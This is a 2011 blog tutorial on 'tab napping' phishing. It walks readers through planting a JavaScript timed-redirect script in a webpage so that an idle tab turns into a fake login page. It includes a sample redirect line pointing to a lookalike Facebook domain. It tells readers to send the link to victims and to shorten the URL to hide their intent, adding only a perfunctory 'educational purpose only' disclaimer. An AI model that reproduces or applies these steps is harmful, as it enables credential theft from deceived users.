Saturday, May 28, 2011





INTODUCTION:

Tab napping is new type of phishing scam that does not require you to click on any url to redirect you to the phishing site instead it relies on the fact that a lot of people used tabbed browsing(Opening multiple tabs while browsing).In tab napping one of your inactive tab is automatically replaced by with a new tab without your knowledge. Tab Napping is a type of phishing with smarter way to confuse the victim.For example Victim was viewing page A in a tab of a browser and then left this idle and now using some other website in another tab of browser. After some time the page A will automatically change to the phishing page. This is your phishing page. Idea is to confuse the victim in multiple tabs of browser.


now lets move on to the tutorial :
1. first we need a simple phishing setup that we have discussed before u can get ur phisher from here.click here

2. u will need ur hosting/blog/aur any webpage in which u can put the java script to sent its link to victim.

3. get ur java script frm here.

4.now u replace the link with your phishing page link in the java script from this line which comes in two places in the script

  timerRedirect = setInterval("location.href='http://facb00kloagin.my3gb.com/index.html'",10000); //set timed redirect

 5. after replacing it   Now, Select all & Copy Tab Napping script and you need to paste this code at the end of the real page html code(means above </html> ).

6.this script will not make any change on ur web page or blog page. 

  • This script will track the user actions and as soon as the blog will kept ideal ,
  • That script will redirect the victim to the phishing page your derived.
  • Now send this blog address to your victim or u can upload ur malicous webpage on a web hosting & then send the link to victim.

 7. now for more betterment u can shorten ur url  so that victim wont be able to know ur intentions get any url shortner from here

HERE IS A DEMO OF TABNAPPING PAGE:

  # Just Go  HERE and wait keep yourself idle for 10 sec. U will be redirected to my phishing page.
Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

0 comments:

Post a Comment